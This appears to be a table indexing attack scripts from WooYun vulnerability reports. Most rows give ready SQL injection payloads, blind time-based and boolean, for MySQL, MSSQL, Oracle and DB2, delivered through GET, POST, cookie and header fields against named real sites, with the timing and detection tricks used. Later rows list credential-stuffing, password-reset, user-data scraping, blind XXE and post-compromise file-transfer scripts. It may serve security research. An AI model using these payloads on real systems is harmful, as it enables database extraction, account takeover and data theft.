| No. | Script ID | Injection type | Script characteristic | Additional notes |
|---|---|---|---|---|
| 1. | wooyun-2010-0126775 | GET | `(ascii(mid(user()from(%s)for(1)))=%s,benchmark(2000000,md5(1)),0)` | `if time.time() - t > 1.5` |
| 2. | wooyun-2010-0120021 | GET | `aaa'XOR(if(length(user())=20,sleep(3),0))OR'bbb` | `try: except:` |
| 3. | wooyun-2010-0119102 | GET/MySQL time blind | `(ascii(mid(user()from(%s)for(1)))=%s,benchmark(2000000,md5(1)),0)` | `if(length(user())=22,sleep(2),0` `try: except:` The script also guesses user(); the threshold is set very low, with a 0.5-second timeout |
| 4. | wooyun-2010-0118298 | Host header injectable | `GET / HTTP/1.1 Host: www.baidu.com'or(length(user())=14)or' Referer: http://dns-ch.xinnet.com` | `if status == 302` |
| 5. | wooyun-2010-0114907 | GET | `if(ascii(mid(lower(user()),%s,1))=%s,benchmark(2000000,md5(1)),0)` | `if time.time() - start_time > 0.5: timeout_count += 1 else: break` `if timeout_count == 3: user += payload` |
| 6. | wooyun-2010-0114492 | Cookie injection/MySQL bool blind | `GET /cart/mini_cart_ajax HTTP/1.1 Cookie: PHPSESSID=c6798728910c94d53a88cd8369b8def5; csdn_cart_user_id=1"%20OR%20length(user())=23--%20;` | `if len(html_doc) > 200:` |
| 7. | wooyun-2010-0106276 | POST | `aa'XOR(if(ascii(mid(lower(user()),%s,1))=%s,sleep(2),0))OR'bb` | `try: except:` `if err_count == 3:` |
| 8. | wooyun-2010-0105690 | GET | `if(ascii(mid(lower(user()),%s,1))=%s,sleep(4),0)` | `try: except:` |
| 9. | wooyun-2010-0104621 | Cookie injection/MySQL bool blind | `GET /catering HTTP/1.1 Cookie: PHPSESSID=5dc8189e97e848e3bcab3381649061af; SESSIONID=5dc8189e97e848e3bcab3381649061af; CITY_ID=*;` | `if html_doc.find(u'/merchant/detail?storeid=2059629') > 0:` |
| 10. | wooyun-2010-0103884 | POST/MySQL bool blind | `aa'XOR(if(length(user())=17,sleep(6),0))OR'bb` | When the expression is True, the delay exceeds 6 seconds; when False, the delay is around 800 ms. `try: except:` |
| 11. | wooyun-2010-0103670 | POST | `123'xor(sleep(ascii(mid(lower(user()),%s,1))=%s))or #"123'xor(if(%s,sleep(5),0)or'" % s` | `try: except:` |
| 12. | wooyun-2010-095449 | GET | `if(ascii(mid(lower(user()),%s,1))=%s,sleep(10),0)` | `try: except:` |
| 13. | wooyun-2010-095438 | POST | `aa'XOR(if("ascii(mid(lower(user()),%s,1))=%s",sleep(5),0))OR'bb` | `try: except:` |
| 14. | wooyun-2010-095304 | POST | `aa'XOR(if("ascii(mid(user(),%s,1))=%s",sleep(5),0))OR'bb` | `try: except:` |
| 15. | wooyun-2010-095083 | GET/MySQL bool blind | `'XOR("ascii(mid(lower(user()),%s,1))=%s")OR'bb"` | Keyword for False: No matched winning logo designs |
| 16. | wooyun-2010-094912 | POST/bool blind | `and substring(lower(system_user),%s,1)>'%s` | When True the page loads slowly, so system_user was guessed as a time-blind example |
| 17. | wooyun-2010-094880 | GET/MySQL bool blind | `aa'XOR(if("mid(lower(user()),%s,1))=%s",1,0))OR'bb` | Keyword for False: No matched winning logo designs |
| 18. | wooyun-2010-094603 | GET | `/*'%2b(select(0)from(select(if("ascii(mid(user(),%s,1))=%s",sleep(5),0)))v)%2b'%22%2b(select(0)from(select(sleep(0)))v)%2b%22*/` | `if time.time() - start_time > 5: timeout_count += 1; print '*', else: break` `if timeout_count == 2: user += payload` |
| 19. | wooyun-2010-094467 | POST/MySQL bool blind | `'aa"XOR(if(ascii(mid(user()from(%s)for(1)))=%s,1,0))OR"bb` | True when “请输入新密码” (“Please enter a new password”) appears |
| 20. | wooyun-2010-092463 | POST | `%%' and ascii(substr(lower(user),%s,1))=%s and '%%'='` | IBM DB2 database |
| 21. | wooyun-2010-090164 | GET | `%s"XOR(sleep(ascii(mid(lower(user())from(%s)for(1)))=%s))OR"bb' % (random.random(), i, ord(payload))` | |
| 22. | wooyun-2010-089831 | POST/MySQL bool blind | `1 or ascii(mid(lower(user())from(%s)for(1)))=%s` | `if html_doc != '0,0,0,0,0,0,0,0,0,0': # True` |
| 23. | wooyun-2010-089924 | GET | `/aaa'XOR(if(ascii(mid(user()from(%s)for(1)))=%s,sleep(3),3))OR'bb/` | Injection format: http://m.soccer.sina.com.hk/t/<injection statement> |
| 24. | wooyun-2010-089917 | POST | `aa"XOR(if(ascii(mid(lower(user())from(%s)for(1)))=%s,sleep(3),0))OR"bb` | `try: except:` `if timeout_count == 3:` |
| 25. | wooyun-2010-089826 | GET | `if(ascii(mid(user()from(%s)for(1)))=%s,sleep(1),3)` | |
| 26. | wooyun-2010-089469 | GET/ | `http://zhidao.baidu.com/c/ah189 and mid(lower(database()),1,1)="c" and "1"="1` | `if html_doc.find(u'安徽电信企业平台_企业知道_百度知道') > 0:` |
| 27. | wooyun-2010-089304 | POST | `123'XOR(if(ascii(mid(lower(user())from(%s)for(1)))=%s,sleep(5),0))OR'bbb` | `raise Exception('oooooooops')` The sid in the POST data must be re-fetched for every request. Classic bypass |
| 28. | wooyun-2010-088834 | GET | `if (ascii(substring(system_user,%s,1))=%s) waitfor delay '0:0:3' --` | |
| 29. | wooyun-2010-088750 | POST | `if(ascii(mid(lower(user())from(%s)for(1)))=%s,sleep(3),0)` | |
| 30. | wooyun-2010-088431 | GET | `123'XOR(if(ascii(mid(lower(user())from(%s)for(1)))=%s,sleep(5),0))OR'bbb` | |
| 31. | wooyun-2010-088294 | POST/Oracle bool blind | `' OR ascii(substr(SYS_CONTEXT('USERENV','CURRENT_USER'),%s,1))=%s AND 1=1 --` | current_user has length 5; Oracle database |
| 32. | wooyun-2010-088037 | Cookie injection/MySQL bool blind | `' OR ascii(mid(database(),%s,1))=%s AND 1=1 --` | When the expression is True the page returns 302; when false, it returns 200. BAIDUID in the Cookie is injectable |
| 33. | wooyun-2010-087980 | Referer header injectable | `str(random.random()) + "aaa'XOR(if(ascii(mid(user(),%s,1))=%s,sleep(1),0))OR'bbb"` | `GET / HTTP/1.1 Referer: aaa*` |
| 34. | wooyun-2010-087825 | GET | `'XOR(if(ascii(mid(user(),%s,1))=%s,sleep(2),0))OR'bbb` | If the program reports false positives, it is because too many threads are stuck and the database is unstable. `try: except:` |
| 35. | wooyun-2010-087531 | GET/MySQL bool blind | `(ascii(mid(user(),%s,1))=%s)` | When True, the page contains a photo-display `div class="upload_one"` |
| 36. | wooyun-2010-087520 | GET | `"%saa'+(select(0)from(select(sleep(if(ascii(mid(user(),%s,1))=%s,5,0))))v)+'bb" % (rand_num, i, ord(payload))` | `if resp.status == 502: raise Exception('ooooooooops')` `print '.',` `except Exception, e: user += payload` |
| 37. | wooyun-2010-086762 | GET | `if(ascii(mid(user(),%s,1))=%s,sleep(1),0)` | |
| 38. | wooyun-2010-086516 | GET | `sleep(1-abs(sign(ascii(mid(lower(user())from(%s)for(1)))-%s)))` | Injection without an equals sign. A single character is guessed through the sleep function: each round takes one character's ASCII code, compares it against each ASCII code in the list, and takes the absolute value of the sign of the difference. If they are equal (True), the sign is 0 and the absolute value is 0, so the query delays; if they differ, the sign is 1 or -1, the absolute value is 1, and there is no delay |
| 39. | wooyun-2010-086372 | GET/MySQL bool blind | `" AND ascii(mid(lower(user())from(%s)for(1)))=%s AND "123"="123` | `if html_doc.find(u'搜索时间') > 0:` |
| 40. | wooyun-2010-084379 | GET | `if(ascii(mid(user(),%s,1))=%s,sleep(1),0)` | By the time the 10th character was guessed, the MySQL server had already gone down; did not go further |
| 41. | wooyun-2010-084801 | GET | `sleep(ascii(mid(lower(user())from(%s)for(1)))=%s)` | The page checks the Referer; it must be set when testing |
| 42. | wooyun-2010-083899 | GET/MySQL bool blind | ?? | True when “韩都衣舍” appears |
| 43. | wooyun-2010-083813 | X-Forwarded-For header injectable/MSSQL | `str(random.random()) + "127.0.0.1'); if (ascii(substring(@@version,%s,1))=%s) waitfor delay '0:0:3' -- "` | `X-Forwarded-For: 127.0.0.1'); waitfor delay '0:0:1' --` Current user is sa; tries to find the SQL Server version |
| 44. | wooyun-2010-083715 | GET/MySQL bool blind | `AND ascii(mid(user()from(%s)for(1)))=%s AND 'aaa'='aaa` | A fairly hidden injection point: at first glance the page may look no different; right-click to view the source and line 757 differs. Bool blind: True when “城北” appears |
| 45. | wooyun-2010-083376 | MySQL time-based blind/MySQL bool blind | `and ascii(mid(user()from(%s)for(1)))=%s and '1'='1` | When testing time-based blind injection, after roughly 10 sleeps got stuck every parameterized page went down; in the end boolean-based MySQL injection was used |
| 46. | wooyun-2010-083257 | POST (classic) | `sleep(ascii(mid(user()from(%s)for(1)))=%s)` | The backend is unstable and returns 404 with some probability, so the HTTP request check was written into a separate function: ignore 404, only consider 200 and 502. A small trick here: with a single sleep(1=1) the backend does not necessarily time out with 502, so I added 3 sleeps together to guarantee the backend returns 502 |
| 47. | wooyun-2010-082740 | GET | `'XOR(if(ascii(mid(user(),%s,1))=%s,sleep(4),0))OR'bbb` | |
| 48. | wooyun-2010-083899 | GET | `if (ascii(substring(@@version,%s,1))=%s) waitfor delay '0:0:5' --` | MSSQL; the script obtains the SQL Server version |
| 49. | wooyun-2010-082690 | GET | `'XOR(if(ascii(mid(user(),%s,1))=%s,sleep(4),0))OR'bbb` | |
| 50. | wooyun-2010-082564 | POST/MySQL bool blind | `AND ascii(substr(SYS_CONTEXT('USERENV','CURRENT_USER'),%s,1))=%s--` | If the page returns destination “广州” (Guangzhou), that means True |
| 51. | wooyun-2010-081949 | GET (classic bypass) | `sleep(ascii(mid(user()from(%s)for(1)))=%s)` | Discuz injection introduced by Lenovo's secondary development on the ThinkPad forum; some SQL keywords such as select are filtered, so error-based injection is of limited use |
| 52. | wooyun-2010-081844 | Cookie injection | `if (ascii(substring(@@version,%s,1))=%s) waitfor delay '0:0:5' --` | MSSQL database; SQL Server version is Microsoft SQL Server 2008 SP |
| 53. | wooyun-2010-081815 | POST | `if (ascii(substring(@@version,%s,1))=%s) waitfor delay '0:0:5' --` | MSSQL database; the script obtains the database version |
| 55. | wooyun-2010-079379 | GET | `(sleep(ascii(mid(user()from(%s)for(1)))=%s))` | Injection works without spaces or commas |
| 56. | wooyun-2015-0137143 | XML quadratic blowup DoS vulnerability | POC submitted via POST | |
| 57. | wooyun-2015-0100000 | Credential stuffing attack | Obtains a large number of PNR codes by collision | |
| 58. | wooyun-2015-0109422 | Arbitrary user password reset script | Password format: `$md5=md5(time().rand(0,100)); $md5='lock'.substr($md5,5,strlen($md5));` | |
| 59. | wooyun-2015-0119851 | Credential stuffing attack | After capturing traffic with Burp Suite, found that userID is purely numeric and oldPwd can be brute-forced, so user passwords can be reset | |
| 60. | wooyun-2015-0126008 | Arbitrary user information query script | Viewing the page source shows the user's username, email, id and phone number inside a hidden form | |
| 61. | wooyun-2016-0172227 | Simple socket file-transfer script | Upload send.py to the compromised host and recv.py to the VPS | Penetration testing needs creative thinking |
| 62. | wooyun-2015-0120222 | Script to read iOS BinaryCookies | Attempts to use the obtained cookie for unauthorized (privilege-escalation) operations | |
| 63. | wooyun-2014-088964 | Credential stuffing attack | `name=<username>&pass=<password MD5 hash>&action=login` | |
| 64. | wooyun-2015-0135483 | Arbitrary user information query script | Queries arbitrary user information through an API | |
| 65. | wooyun-2015-0145012 | Credential stuffing attack | A design flaw in the enterprise mailbox allows credential stuffing | |
| 66. | wooyun-2015-0105251 | Queries arbitrary user information through an API | Submission method: `urllib2.urlopen(req, data="")` | |
| 67. | wooyun-2015-0135615 | Blind XXE | Visiting `http://**.**.**.**/kv?act=set&k={key}&v={value}` sets a key/value pair on the remote host | `http://**.**.**.**/kv?act=get&k=<the key just set>` shows whether the pair was set, which verifies the vulnerability |
| 68. | wooyun-2015-0135356 | Blind XXE | Unsafe use of simplexml_load_string leads to XXE | |